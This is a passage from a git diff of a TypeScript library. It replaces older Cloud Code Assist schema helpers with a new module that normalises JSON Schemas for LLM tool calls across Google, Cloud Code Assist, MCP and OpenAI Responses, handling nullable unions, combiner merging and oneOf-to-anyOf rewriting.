(!Array.isArray(variantsRaw)) continue; - - let hasNullVariant = false; - const nonNullVariants: unknown[] = []; - for (const variant of variantsRaw) { - if (isJsonObject(variant) && variant.type === "null") { - let keyCount = 0; - for (const _k in variant) { - if (++keyCount > 1) break; - } - if (keyCount === 1) { - hasNullVariant = true; - continue; - } - } - nonNullVariants.push(variant); - } - - if (!hasNullVariant || nonNullVariants.length !== 1 || !isJsonObject(nonNullVariants[0])) { - continue; - } - - const nextSchema = copySchemaWithout(schema, combiner); - const nonNullVariant = nonNullVariants[0]; - for (const key in nonNullVariant) { - const value = nonNullVariant[key]; - const existingValue = nextSchema[key]; - if (existingValue !== undefined && !areJsonValuesEqual(existingValue, value)) { - return { schema, nullable: false }; - } - if (existingValue === undefined) { - nextSchema[key] = value; - } - } - return { schema: nextSchema, nullable: true }; - } - - return { schema, nullable: false }; -} - -interface NullableNormalizationResult { - schema: unknown; - nullable: boolean; -} - -function normalizeNullablePropertiesForCloudCodeAssist( - value: unknown, - isPropertySchema = false, - epoch: number = epochNext(), -): NullableNormalizationResult { - if (Array.isArray(value)) { - if (!once(value, epoch)) { - return { schema: [], nullable: false }; - } - return { - schema: value.map(entry => normalizeNullablePropertiesForCloudCodeAssist(entry, false, epoch).schema), - nullable: false, - }; - } - if (!isJsonObject(value)) { - return { schema: value, nullable: false }; - } - if (!once(value, epoch)) { - return { schema: {}, nullable: false }; - } - - const normalized: JsonObject = {}; - for (const key in value) { - normalized[key] = normalizeNullablePropertiesForCloudCodeAssist(value[key], false, epoch).schema; - } - - if (isJsonObject(normalized.properties)) { - const properties = normalized.properties; - const required = new Set( - Array.isArray(normalized.required) - ? normalized.required.filter((entry): entry is string => typeof entry === "string") - : [], - ); - const nextProperties: JsonObject = {}; - for (const name in properties) { - const normalizedProperty = normalizeNullablePropertiesForCloudCodeAssist(properties[name], true, epoch); - nextProperties[name] = normalizedProperty.schema; - if (normalizedProperty.nullable) { - required.delete(name); - } - } - normalized.properties = nextProperties; - if (Array.isArray(normalized.required)) { - normalized.required = Array.from(required); - } - } - - if (!isPropertySchema) { - return { schema: normalized, nullable: false }; - } - - return extractNullableUnionSchema(normalized); -} - -/** - * Keep validation synchronous in this request path. - * Replaces the previous AJV-based meta-schema check with a tiny - * structural validator that catches the failure modes the CCA pipeline - * actually produces. - */ -function isValidCCASchema(schema: unknown): boolean { - return isValidJsonSchema(schema); -} - -/** See COMBINATOR_KEYS in fields.ts — CCA forbids all three combiners. */ -const CCA_FORBIDDEN_COMBINERS: Record<string, true> = { anyOf: true, oneOf: true, allOf: true }; - -function hasResidualCloudCodeAssistIncompatibilities(value: unknown, epoch: number = epochNext()): boolean { - if (Array.isArray(value)) { - if (!once(value, epoch)) return false; - return value.some(entry => hasResidualCloudCodeAssistIncompatibilities(entry, epoch)); - } - if (!isJsonObject(value)) { - return false; - } - if (!once(value, epoch)) { - return false; - } - - if (Array.isArray(value.type) || value.type === "null") { - return true; - } - if (Object.hasOwn(value, "nullable")) { - return true; - } - for (const combiner in CCA_FORBIDDEN_COMBINERS) { - if (Array.isArray(value[combiner])) { - return true; - } - } - for (const k in value) { - if (hasResidualCloudCodeAssistIncompatibilities(value[k], epoch)) { - return true; - } - } - return false; -} -const CLOUD_CODE_ASSIST_CLAUDE_FALLBACK_SCHEMA = { - type: "object", - properties: {}, -} as const; - -/** - * Prepare schema for Claude on Cloud Code Assist: - * sanitize -> normalize union objects -> validate -> fallback. - * - * Fallback is per-tool and fail-open to avoid rejecting the entire request when - * one tool schema is invalid. - */ -export function prepareSchemaForCCA(value: unknown): unknown { - const sanitized = sanitizeSchemaForCCA(value); - const pass1 = normalizeSchemaForCCA(sanitized); - // Second pass: strip anyOf/oneOf created by mergeObjectCombinerVariants during pass1 - const normalized = stripResidualCombiners(pass1); - const nullableNormalized = normalizeNullablePropertiesForCloudCodeAssist(normalized).schema; - if (hasResidualCloudCodeAssistIncompatibilities(nullableNormalized)) { - logger.debug("CCA schema has residual incompatibilities, using fallback"); - return CLOUD_CODE_ASSIST_CLAUDE_FALLBACK_SCHEMA; - } - if (isValidCCASchema(nullableNormalized)) { - return nullableNormalized; - } - logger.debug("CCA schema failed validation, using fallback"); - return CLOUD_CODE_ASSIST_CLAUDE_FALLBACK_SCHEMA; -} diff --git a/packages/ai/src/utils/schema/normalize.ts b/packages/ai/src/utils/schema/normalize.ts new file mode 100644 index 000000000..40446cbb7 --- /dev/null +++ b/packages/ai/src/utils/schema/normalize.ts @@ -0,0 +1,1494 @@ +/** + * Provider-specific JSON Schema normalization used in the request path. + * + * Google's Schema proto, Cloud Code Assist's Claude bridge, and MCP/AJV + * validation all reject different subsets of standard JSON Schema. This module + * exposes one option-driven core plus thin dispatchers that pin the option set + * for each target. + */ +import { logger } from "@oh-my-pi/pi-utils"; +import { dereferenceJsonSchema } from "./dereference"; +import { upgradeJsonSchemaTo202012 } from "./draft"; +import { areJsonValuesEqual, mergePropertySchemas } from "./equality"; +import { + CLOUD_CODE_ASSIST_SHARED_SCHEMA_KEYS, + CLOUD_CODE_ASSIST_TYPE_SPECIFIC_KEYS, + COMBINATOR_KEYS, + LIFTABLE_TO_DESCRIPTION_FIELDS, + NON_STRUCTURAL_SCHEMA_KEYS, + UNSUPPORTED_SCHEMA_FIELDS, +} from "./fields"; +import { isValidJsonSchema } from "./meta-validator"; +import { type DescriptionSpillFormat, spillToDescription } from "./spill"; +import { enter, epochNext, exit, once, stamp } from "./stamps"; +import type { JsonObject } from "./types"; +import { isJsonObject } from "./types"; + +export type ResidualSchemaIncompatibility = "type-array" | "type-null" | "nullable" | "combiners"; + +export interface NormalizeSchemaOptions { + unsupportedFields: (key: string) => boolean; + normalizeFieldNames: boolean; + collapseNullFields: boolean; + normalizeTypeArrayToNullable: boolean; + stripNullableKeyword: boolean; + autoPropertyOrdering: boolean; + ensureObjectProperties: boolean; + liftStrippedToDescription: + | false + | { + keys?: (key: string) => boolean; + format?: DescriptionSpillFormat; + }; + mergeObjectCombiners: boolean; + collapseSameTypeCombiners: boolean; + collapseMixedTypeCombiners: boolean; + stripResidualCombinersFixpoint: boolean; + extractNullableFromUnions: boolean; + rejectResidualIncompatibilities?: ReadonlyArray<ResidualSchemaIncompatibility>; + validateAndFallback?: { fallback: unknown }; +} + +interface NormalizeSchemaWalkOptions extends NormalizeSchemaOptions { + insideProperties: boolean; + epoch: number; +} + +interface ResidualIncompatibilityChecks { + typeArray: boolean; + typeNull: boolean; + nullable: boolean; + combiners: boolean; +} + +const SNAKE_TO_CAMEL_RENAMES = new Map<string, string>([ + ["additional_properties", "additionalProperties"], + ["any_of", "anyOf"], + ["prefix_items", "prefixItems"], + ["property_ordering", "propertyOrdering"], +]); + +const JSON_SCHEMA_COMBINERS = ["anyOf", "oneOf"] as const; +const CCA_FORBIDDEN_COMBINERS = new Set(["anyOf", "oneOf", "allOf"]); + +const CLOUD_CODE_ASSIST_CLAUDE_FALLBACK_SCHEMA = { + type: "object", + properties: {}, +} as const; + +function isGoogleUnsupportedSchemaField(key: string): boolean { + return Object.hasOwn(UNSUPPORTED_SCHEMA_FIELDS, key); +} + +function isMcpUnsupportedSchemaField(key: string): boolean { + return key === "$schema"; +} + +function isDefaultLiftableToDescriptionField(key: string): boolean { + return Object.hasOwn(LIFTABLE_TO_DESCRIPTION_FIELDS, key); +} + +/** + * Returns `obj` unchanged when no renamable key is present; otherwise returns + * a fresh shallow-copy with snake_case keys rewritten. The collision rule + * matches upstream (`pop(from)` → `set(to)`): snake_case wins over an + * existing camelCase entry, matching python-genai/_transformers.py:751. + */ +function applySnakeCaseRenames(obj: JsonObject): JsonObject { + let needsRename = false; + for (const k in obj) { + if (!Object.hasOwn(obj, k)) continue; + if (SNAKE_TO_CAMEL_RENAMES.has(k)) { + needsRename = true; + break; + } + } + if (!needsRename) return obj; + const out: JsonObject = {}; + for (const k in obj) { + if (!Object.hasOwn(obj, k)) continue; + const renamed = SNAKE_TO_CAMEL_RENAMES.get(k); + if (renamed !== undefined) { + out[renamed] = obj[k]; + } else if (!outHasOwn(out, k)) { + out[k] = obj[k]; + } + } + return out; +} + +/** + * `handle_null_fields` (python-genai/_transformers.py:584-640) applied at the + * parent level BEFORE child recursion — matches upstream's call order at + * `process_schema` line 768. Returns a new object when changes apply, the + * original reference otherwise (zero-allocation fast path). + */ +function preHandleNullFields(obj: JsonObject): JsonObject { + if (obj.type === "null") { + const out: JsonObject = {}; + for (const k in obj) { + if (!Object.hasOwn(obj, k) || k === "type") continue; + out[k] = obj[k]; + } + out.nullable = true; + return out; + } + if (!Array.isArray(obj.anyOf)) return obj; + const variants = obj.anyOf as unknown[]; + let sawNull = false; + const kept: unknown[] = []; + for (const v of variants) { + if (isJsonObject(v) && v.type === "null") { + sawNull = true; + continue; + } + kept.push(v); + } + if (!sawNull) return obj; + const out: JsonObject = {}; + for (const k in obj) { + if (Object.hasOwn(obj, k)) out[k] = obj[k]; + } + out.nullable = true; + if (kept.length === 0) { + delete out.anyOf; + } else if (kept.length === 1 && isJsonObject(kept[0])) { + delete out.anyOf; + const only = kept[0]; + for (const k in only) { + if (Object.hasOwn(only, k) && !outHasOwn(out, k)) out[k] = only[k]; + } + } else { + out.anyOf = kept; + } + return out; +} + +function outHasOwn(obj: JsonObject, key: string): boolean { + return Object.hasOwn(obj, key); +} + +function inferJsonSchemaTypeFromValue(value: unknown): string | undefined { + if (value === null) return "null"; + if (Array.isArray(value)) return "array"; + switch (typeof value) { + case "string": + return "string"; + case "number": + return "number"; + case "boolean": + return "boolean"; + case "object": + return "object"; + default: + return undefined; + } +} + +function pushEnumValue(values: unknown[], value: unknown): void { + if (!values.some(existing => areJsonValuesEqual(existing, value))) { + values.push(value); + } +} + +function pushStrippedDescriptionEntry( + spill: Array<[string, unknown]> | undefined, + key: string, + value: unknown, + options: NormalizeSchemaWalkOptions, +): Array<[string, unknown]> | undefined { + const lift = options.liftStrippedToDescription; + if (!lift) return spill; + const isLiftable = lift.keys ?? isDefaultLiftableToDescriptionField; + if (!isLiftable(key)) return spill; + const next = spill ?? []; + next.push([key, value]); + return next; +} + +function applyDescriptionSpill( + result: JsonObject, + spill: Array<[string, unknown]> | undefined, + options: NormalizeSchemaWalkOptions, +): void { + const lift = options.liftStrippedToDescription; + if (!lift || spill === undefined) return; + spillToDescription(result, spill, lift.format ?? "spill"); +} + +function normalizeSchemaNode(value: unknown, options: NormalizeSchemaWalkOptions): unknown { + if (Array.isArray(value)) { + if (!once(value, options.epoch)) return []; + return value.map(entry => normalizeSchemaNode(entry, options)); + } + if (!isJsonObject(value)) { + return value; + } + if (!once(value, options.epoch)) return {}; + let obj = options.normalizeFieldNames && !options.insideProperties ? applySnakeCaseRenames(value) : value; + if (options.collapseNullFields && !options.insideProperties) { + obj = preHandleNullFields(obj); + } + const result: JsonObject = {}; + let spill: Array<[string, unknown]> | undefined; + for (const combiner of JSON_SCHEMA_COMBINERS) { + if (!Array.isArray(obj[combiner])) continue; + const variants = obj[combiner] as JsonObject[]; + const allHaveConst = variants.every(v => isJsonObject(v) && "const" in v); + if (!allHaveConst || variants.length === 0) continue; + + const dedupedEnum: unknown[] = []; + for (const variant of variants) { + pushEnumValue(dedupedEnum, variant.const); + } + result.enum = dedupedEnum; + + const explicitTypes = variants + .map(variant => variant.type) + .filter((variantType): variantType is string => typeof variantType === "string"); + const allHaveSameExplicitType = + explicitTypes.length === variants.length && + explicitTypes.every(variantType => variantType === explicitTypes[0]); + if (allHaveSameExplicitType && explicitTypes[0]) { + result.type = explicitTypes[0]; + } else { + const inferredTypes = dedupedEnum + .map(enumValue => inferJsonSchemaTypeFromValue(enumValue)) + .filter((inferredType): inferredType is string => inferredType !== undefined); + const inferredTypeSet = new Set(inferredTypes); + if (inferredTypeSet.size === 1) { + result.type = inferredTypes[0]; + } else { + const nonNullInferredTypes = inferredTypes.filter(inferredType => inferredType !== "null"); + const nonNullTypeSet = new Set(nonNullInferredTypes); + if (inferredTypes.includes("null") && nonNullTypeSet.size === 1) { + result.type = nonNullInferredTypes[0]; + if (!options.stripNullableKeyword) { + result.nullable = true; + } + } + } + } + + for (const key in obj) { + if (!Object.hasOwn(obj, key) || key === combiner || outHasOwn(result, key)) continue; + const entry = obj[key]; + if (!options.insideProperties && options.unsupportedFields(key)) { + spill = pushStrippedDescriptionEntry(spill, key, entry, options); + continue; + } + if (options.stripNullableKeyword && key === "nullable") continue; + result[key] = normalizeSchemaNode(entry, { + ...options, + insideProperties: key === "properties", + }); + } + applyDescriptionSpill(result, spill, options); + return applyNodePostProcessing(result, options); + } + + let constValue: unknown; + for (const key in obj) { + if (!Object.hasOwn(obj, key)) continue; + const entry = obj[key]; + if (!options.insideProperties && options.unsupportedFields(key)) { + spill = pushStrippedDescriptionEntry(spill, key, entry, options); + continue; + } + if (options.stripNullableKeyword && key === "nullable") continue; + if (key === "const") { + constValue = entry; + continue; + } + result[key] = normalizeSchemaNode(entry, { + ...options, + insideProperties: key === "properties", + }); + } + + if (options.normalizeTypeArrayToNullable && Array.isArray(result.type)) { + const types = (result.type as unknown[]).filter((t): t is string => typeof t === "string"); + const nonNull = types.filter(t => t !== "null"); + if (types.includes("null") && !options.stripNullableKeyword) { + result.nullable = true; + } + result.type = nonNull[0] ?? types[0]; + } + if (constValue !== undefined) { + const existingEnum = Array.isArray(result.enum) ? result.enum : []; + pushEnumValue(existingEnum, constValue); + result.enum = existingEnum; + if (!result.type) { + result.type = inferJsonSchemaTypeFromValue(constValue); + } + } + + if (options.collapseNullFields && result.type === "null") { + delete result.type; + if (!options.stripNullableKeyword) result.nullable = true; + } + + if ( + options.autoPropertyOrdering && + result.type === "object" && + !outHasOwn(result, "propertyOrdering") && + isJsonObject(result.properties) + ) { + const props = result.properties; + const keys: string[] = []; + for (const k in props) { + if (Object.hasOwn(props, k)) keys.push(k); + } + if (keys.length > 1) result.propertyOrdering = keys; + } + + if (options.ensureObjectProperties && result.type === "object" && !outHasOwn(result, "properties")) { + result.properties = {}; + } + + applyDescriptionSpill(result, spill, options); + return applyNodePostProcessing(result, options); +} + +function applyNodePostProcessing(schema: JsonObject, options: NormalizeSchemaWalkOptions): JsonObject { + let current = schema; + for (const combiner of JSON_SCHEMA_COMBINERS) { + if (options.mergeObjectCombiners) current = mergeObjectCombinerVariants(current, combiner); + if (options.collapseMixedTypeCombiners) current = collapseMixedTypeCombinerVariants(current, combiner); + if (options.collapseSameTypeCombiners) current = collapseSameTypeCombinerVariants(current, combiner); + } + return current; +} + +/** Copy all keys from a schema except the specified combiner key. */ +export function copySchemaWithout(schema: JsonObject, combiner: string): JsonObject { + const { [combiner]: _, ...rest } = schema; + return rest; +} + +function mergeObjectCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { + const variantsRaw = schema[combiner]; + if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) { + return schema; + } + + const variants: JsonObject[] = []; + for (const entry of variantsRaw) { + if (!isJsonObject(entry)) { + return schema; + } + const variantType = entry.type; + const hasObjectShape = + isJsonObject(entry.properties) || + Array.isArray(entry.required) || + Object.hasOwn(entry, "additionalProperties"); + if (variantType === undefined && !hasObjectShape) { + return schema; + } + if (variantType !== undefined && variantType !== "object") { + return schema; + } + if (entry.properties !== undefined && !isJsonObject(entry.properties)) { + return schema; + } + if (entry.required !== undefined && !Array.isArray(entry.required)) { + return schema; + } + variants.push(entry); + } + + const mergedProperties: JsonObject = {}; + const ownProperties = isJsonObject(schema.properties) ? schema.properties : {}; + for (const name in ownProperties) { + if (Object.hasOwn(ownProperties, name)) mergedProperties[name] = ownProperties[name]; + } + + for (const variant of variants) { + const properties = isJsonObject(variant.properties) ? variant.properties : {}; + for (const name in properties) { + if (!Object.hasOwn(properties, name)) continue; + const propertySchema = properties[name]; + const existingSchema = mergedProperties[name]; + mergedProperties[name] = + existingSchema === undefined ? propertySchema : mergePropertySchemas(existingSchema, propertySchema); + } + } + + const nextSchema = copySchemaWithout(schema, combiner); + nextSchema.type = "object"; + nextSchema.properties = mergedProperties; + + let requiredIntersection: string[] | undefined; + for (const variant of variants) { + const variantRequired = Array.isArray(variant.required) + ? variant.required.filter((r): r is string => typeof r === "string") + : []; + if (requiredIntersection === undefined) { + requiredIntersection = [...variantRequired]; + } else { + const reqSet = new Set(variantRequired); + requiredIntersection = requiredIntersection.filter(r => reqSet.has(r)); + } + } + const parentRequired = Array.isArray(schema.required) + ? schema.required.filter((r): r is string => typeof r === "string") + : []; + const safeRequired = new Set<string>(); + for (const name of requiredIntersection ?? []) { + if (Object.hasOwn(mergedProperties, name)) safeRequired.add(name); + } + for (const name of parentRequired) { + if (Object.hasOwn(ownProperties, name) && Object.hasOwn(mergedProperties, name)) { + safeRequired.add(name); + } + } + const requiredInPropertyOrder: string[] = []; + for (const name in mergedProperties) { + if (Object.hasOwn(mergedProperties, name) && safeRequired.has(name)) requiredInPropertyOrder.push(name); + } + if (requiredInPropertyOrder.length > 0) { + nextSchema.required = requiredInPropertyOrder; + } else { + delete nextSchema.required; + } + + return nextSchema; +} + +function collapseMixedTypeCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { + const variantsRaw = schema[combiner]; + if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) { + return schema; + } + + const seenTypes = new Set<string>(); + const variantTypes: string[] = []; + const mergedVariantFields: JsonObject = {}; + for (const entry of variantsRaw) { + if (!isJsonObject(entry) || typeof entry.type !== "string") { + return schema; + } + + const variantType = entry.type; + if (seenTypes.has(variantType)) { + return schema; + } + + const allowedKeys = CLOUD_CODE_ASSIST_TYPE_SPECIFIC_KEYS[variantType]; + if (!allowedKeys) { + return schema; + } + + for (const key in entry) { + if (!Object.hasOwn(entry, key)) continue; + const variantValue = entry[key]; + if (key === "type") continue; + if (!Object.hasOwn(allowedKeys, key) && !Object.hasOwn(CLOUD_CODE_ASSIST_SHARED_SCHEMA_KEYS, key)) { + return schema; + } + + const existingValue = mergedVariantFields[key]; + if (existingValue !== undefined && !areJsonValuesEqual(existingValue, variantValue)) { + return schema; + } + mergedVariantFields[key] = variantValue; + } + + seenTypes.add(variantType); + variantTypes.push(variantType); + } + + if (variantTypes.length < 2 || variantTypes.every(type => type === "object")) { + return schema; + } + + const nextSchema = copySchemaWithout(schema, combiner); + const nonNullTypes = variantTypes.filter(t => t !== "null"); + nextSchema.type = nonNullTypes[0] ?? variantTypes[0]; + for (const key in mergedVariantFields) { + if (!Object.hasOwn(mergedVariantFields, key)) continue; + const value = mergedVariantFields[key]; + const existingValue = nextSchema[key]; + if (existingValue !== undefined && !areJsonValuesEqual(existingValue, value)) { + return schema; + } + if (existingValue === undefined) { + nextSchema[key] = value; + } + } + return nextSchema; +} + +function collapseSameTypeCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { + const variantsRaw = schema[combiner]; + if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) return schema; + let commonType: string | undefined; + let firstEntry: JsonObject | undefined; + for (const entry of variantsRaw) { + if (!isJsonObject(entry) || typeof entry.type !== "string") return schema; + if (commonType === undefined) { + commonType = entry.type; + firstEntry = entry; + } else if (entry.type !== commonType) return schema; + } + if (!firstEntry) return schema; + const nextSchema = copySchemaWithout(schema, combiner); + for (const key in firstEntry) { + if (Object.hasOwn(firstEntry, key) && !outHasOwn(nextSchema, key)) nextSchema[key] = firstEntry[key]; + } + return nextSchema; +} + +/** + * Recursively strip any remaining anyOf/oneOf that same-type or mixed-type + * collapse can handle. This is needed because object-combiner merging can + * create new anyOf in merged subtrees after child normalization already ran. + */ +export function stripResidualCombiners(value: unknown, epoch: number = epochNext()): unknown { + if (Array.isArray(value)) { + if (!once(value, epoch)) return []; + return value.map(entry => stripResidualCombiners(entry, epoch)); + } + if (!isJsonObject(value)) return value; + if (!once(value, epoch)) return {}; + const result: JsonObject = {}; + for (const key in value) { + if (Object.hasOwn(value, key)) result[key] = stripResidualCombiners(value[key], epoch); + } + let current: JsonObject = result; + let changed = true; + while (changed) { + changed = false; + for (const combiner of JSON_SCHEMA_COMBINERS) { + const sameType = collapseSameTypeCombinerVariants(current, combiner); + if (sameType !== current) { + current = sameType; + changed = true; + } + const mixed = collapseMixedTypeCombinerVariants(current, combiner); + if (mixed !== current) { + current = mixed; + changed = true; + } + } + } + return current; +} + +interface NullableExtractionResult { + schema: unknown; + nullable: boolean; +} + +function extractNullableUnionSchema(schema: unknown): NullableExtractionResult { + if (!isJsonObject(schema)) { + return { schema, nullable: false }; + } + + if (schema.nullable === true) { + const nextSchema = { ...schema }; + delete nextSchema.nullable; + return { schema: nextSchema, nullable: true }; + } + + if (Array.isArray(schema.type)) { + const typeVariants = schema.type.filter((entry): entry is string => typeof entry === "string"); + const nonNullTypes = typeVariants.filter(entry => entry !== "null"); + if (typeVariants.includes("null") && nonNullTypes.length === 1) { + const nextSchema = { ...schema, type: nonNullTypes[0] }; + return { schema: nextSchema, nullable: true }; + } + } + + for (const combiner of JSON_SCHEMA_COMBINERS) { + const variantsRaw = schema[combiner]; + if (!Array.isArray(variantsRaw)) continue; + + let hasNullVariant = false; + const nonNullVariants: unknown[] = []; + for (const variant of variantsRaw) { + if (isJsonObject(variant) && variant.type === "null") { + let keyCount = 0; + for (const k in variant) { + if (!Object.hasOwn(variant, k)) continue; + if (++keyCount > 1) break; + } + if (keyCount === 1) { + hasNullVariant = true; + continue; + } + } + nonNullVariants.push(variant); + } + + if (!hasNullVariant || nonNullVariants.length !== 1 || !isJsonObject(nonNullVariants[0])) { + continue; + } + + const nextSchema = copySchemaWithout(schema, combiner); + const nonNullVariant = nonNullVariants[0]; + for (const key in nonNullVariant) { + if (!Object.hasOwn(nonNullVariant, key)) continue; + const value = nonNullVariant[key]; + const existingValue = nextSchema[key]; + if (existingValue !== undefined && !areJsonValuesEqual(existingValue, value)) { + return { schema, nullable: false }; + } + if (existingValue === undefined) { + nextSchema[key] = value; + } + } + return { schema: nextSchema, nullable: true }; + } + + return { schema, nullable: false }; +} + +interface NullableNormalizationResult { + schema: unknown; + nullable: boolean; +} + +function normalizeNullablePropertiesForCloudCodeAssist( + value: unknown, + isPropertySchema = false, + epoch: number = epochNext(), +): NullableNormalizationResult { + if (Array.isArray(value)) { + if (!once(value, epoch)) { + return { schema: [], nullable: false }; + } + return { + schema: value.map(entry => normalizeNullablePropertiesForCloudCodeAssist(entry, false, epoch).schema), + nullable: false, + }; + } + if (!isJsonObject(value)) { + return { schema: value, nullable: false }; + } + if (!once(value, epoch)) { + return { schema: {}, nullable: false }; + } + + const normalized: JsonObject = {}; + for (const key in value) { + if (Object.hasOwn(value, key)) + normalized[key] = normalizeNullablePropertiesForCloudCodeAssist(value[key], false, epoch).schema; + } + + if (isJsonObject(normalized.properties)) { + const properties = normalized.properties; + const required = new Set( + Array.isArray(normalized.required) + ? normalized.required.filter((entry): entry is string => typeof entry === "string") + : [], + ); + const nextProperties: JsonObject = {}; + for (const name in properties) { + if (!Object.hasOwn(properties, name)) continue; + const normalizedProperty = normalizeNullablePropertiesForCloudCodeAssist(properties[name], true, epoch); + nextProperties[name] = normalizedProperty.schema; + if (normalizedProperty.nullable) { + required.delete(name); + } + } + normalized.properties = nextProperties; + if (Array.isArray(normalized.required)) { + normalized.required = Array.from(required); + } + } + + if (!isPropertySchema) { + return { schema: normalized, nullable: false }; + } + + return extractNullableUnionSchema(normalized); +} + +function createResidualIncompatibilityChecks( + checks: ReadonlyArray<ResidualSchemaIncompatibility> | undefined, +): ResidualIncompatibilityChecks | undefined { + if (!checks || checks.length === 0) return undefined; + const result: ResidualIncompatibilityChecks = { + typeArray: false, + typeNull: false, + nullable: false, + combiners: false, + }; + for (const check of checks) { + switch (check) { + case "type-array": + result.typeArray = true; + break; + case "type-null": + result.typeNull = true; + break; + case "nullable": + result.nullable = true; + break; + case "combiners": + result.combiners = true; + break; + } + } + return result; +} + +function hasResidualSchemaIncompatibilities( + value: unknown, + checks: ResidualIncompatibilityChecks, + epoch: number = epochNext(), +): boolean { + if (Array.isArray(value)) { + if (!once(value, epoch)) return false; + return value.some(entry => hasResidualSchemaIncompatibilities(entry, checks, epoch)); + } + if (!isJsonObject(value)) { + return false; + } + if (!once(value, epoch)) { + return false; + } + + if (checks.typeArray && Array.isArray(value.type)) return true; + if (checks.typeNull && value.type === "null") return true; + if (checks.nullable && Object.hasOwn(value, "nullable")) return true; + if (checks.combiners) { + for (const combiner of CCA_FORBIDDEN_COMBINERS) { + if (Array.isArray(value[combiner])) return true; + } + } + for (const k in value) { + if (!Object.hasOwn(value, k)) continue; + if (hasResidualSchemaIncompatibilities(value[k], checks, epoch)) { + return true; + } + } + return false; +} + +export function normalizeSchema(value: unknown, options: NormalizeSchemaOptions): unknown { + const upgraded = upgradeJsonSchemaTo202012(value); + const dereferenced = dereferenceJsonSchema(upgraded); + let normalized = normalizeSchemaNode(dereferenced, { + ...options, + insideProperties: false, + epoch: epochNext(), + }); + if (options.stripResidualCombinersFixpoint) { + normalized = stripResidualCombiners(normalized); + } + if (options.extractNullableFromUnions) { + normalized = normalizeNullablePropertiesForCloudCodeAssist(normalized).schema; + } + const residualChecks = createResidualIncompatibilityChecks(options.rejectResidualIncompatibilities); + if (residualChecks && hasResidualSchemaIncompatibilities(normalized, residualChecks)) { + logger.debug("Schema has residual provider incompatibilities, using fallback"); + return options.validateAndFallback?.fallback ?? normalized; + } + if (options.validateAndFallback && !isValidJsonSchema(normalized)) { + logger.debug("Schema failed validation, using fallback"); + return options.validateAndFallback.fallback; + } + return normalized; +} + +export function normalizeSchemaForGoogle(value: unknown): unknown { + return normalizeSchema(value, { + unsupportedFields: isGoogleUnsupportedSchemaField, + normalizeFieldNames: true, + collapseNullFields: true, + normalizeTypeArrayToNullable: true, + stripNullableKeyword: false, + autoPropertyOrdering: true, + ensureObjectProperties: true, + liftStrippedToDescription: { format: "spill" }, + mergeObjectCombiners: false, + collapseSameTypeCombiners: false, + collapseMixedTypeCombiners: false, + stripResidualCombinersFixpoint: false, + extractNullableFromUnions: false, + }); +} + +export function normalizeSchemaForCCA(value: unknown): unknown { + return normalizeSchema(value, { + unsupportedFields: isGoogleUnsupportedSchemaField, + normalizeFieldNames: true, + collapseNullFields: false, + normalizeTypeArrayToNullable: true, + stripNullableKeyword: true, + autoPropertyOrdering: false, + ensureObjectProperties: true, + liftStrippedToDescription: { format: "spill" }, + mergeObjectCombiners: true, + collapseSameTypeCombiners: true, + collapseMixedTypeCombiners: true, + stripResidualCombinersFixpoint: true, + extractNullableFromUnions: true, + rejectResidualIncompatibilities: ["type-array", "type-null", "nullable", "combiners"], + validateAndFallback: { fallback: CLOUD_CODE_ASSIST_CLAUDE_FALLBACK_SCHEMA }, + }); +} + +export function normalizeSchemaForMCP(value: unknown): unknown { + return normalizeSchema(value, { + unsupportedFields: isMcpUnsupportedSchemaField, + normalizeFieldNames: false, + collapseNullFields: false, + normalizeTypeArrayToNullable: false, + stripNullableKeyword: true, + autoPropertyOrdering: false, + ensureObjectProperties: false, + liftStrippedToDescription: false, + mergeObjectCombiners: false, + collapseSameTypeCombiners: false, + collapseMixedTypeCombiners: false, + stripResidualCombinersFixpoint: false, + extractNullableFromUnions: false, + }); +} + +// --------------------------------------------------------------------------- +// OpenAI Responses — `oneOf` → `anyOf` rewrite +// --------------------------------------------------------------------------- + +/** + * OpenAI Responses rejects `oneOf` in tool schemas even when strict mode is + * disabled. Non-strict schemas can still use `anyOf`, so preserve the union + * shape by recursively rewriting `oneOf` branches to `anyOf`. + * + * Identity-preserving: returns the input reference unchanged when no rewrite + * occurred so callers can dedupe via reference equality (and the strict-mode + * cache stays warm). If a node has both `oneOf` and `anyOf`, the two are + * concatenated (the wire payload accepts a single union; preserving both + * would not survive). + */ +export function sanitizeSchemaForOpenAIResponses(schema: JsonObject): JsonObject { + return rewriteOneOfToAnyOf(schema) as JsonObject; +} + +/** + * Alias for {@link sanitizeSchemaForOpenAIResponses} matching the + * `normalizeSchemaFor*` dispatcher naming used elsewhere in this module. + */ +export const normalizeSchemaForOpenAIResponses: (schema: JsonObject) => JsonObject = sanitizeSchemaForOpenAIResponses; + +function rewriteOneOfToAnyOf(value: unknown): unknown { + if (Array.isArray(value)) { + let changed = false; + const rewritten = value.map(item => { + const next = rewriteOneOfToAnyOf(item); + if (next !== item) changed = true; + return next; + }); + return changed ? rewritten : value; + } + + if (!value || typeof value !== "object") { + return value; + } + + const input = value as Record<string, unknown>; + let changed = false; + const output: Record<string, unknown> = {}; + for (const key in input) { + const child = input[key]; + // Skip `oneOf` here; it is re-emitted as `anyOf` after the loop so + // neighboring `anyOf` entries can be folded in. + if (key === "oneOf") { + changed = true; + continue; + } + const next = rewriteOneOfToAnyOf(child); + if (next !== child) changed = true; + output[key] = next; + } + + // Re-emit `oneOf` content under `anyOf`, concatenating with any existing + // `anyOf` branches in the original node. + if (Array.isArray(input.oneOf)) { + const rewrittenOneOf = rewriteOneOfToAnyOf(input.oneOf); + const existingAnyOf = output.anyOf; + output.anyOf = Array.isArray(existingAnyOf) + ? [...existingAnyOf, ...(rewrittenOneOf as unknown[])] + : rewrittenOneOf; + } + + return changed ? output : value; +} + +// --------------------------------------------------------------------------- +// OpenAI strict mode — sanitize + enforce +// --------------------------------------------------------------------------- + +/** + * Single primitive JSON Schema `type` keyword. Strict mode treats these + * scalar types as concrete-enough; aggregate shapes (object, array) are not + * included because they're not derivable from a single `enum`/`const` value. + */ +type StrictPrimitiveType = "null" | "string" | "number" | "boolean"; + +function primitiveJsonTypeOf(value: unknown): StrictPrimitiveType | undefined { + if (value === null) return "null"; + switch (typeof value) { + case "string": + return "string"; + case "number": + return "number"; + case "boolean": + return "boolean"; + default: + return undefined; + } +} + +/** + * Returns the primitive 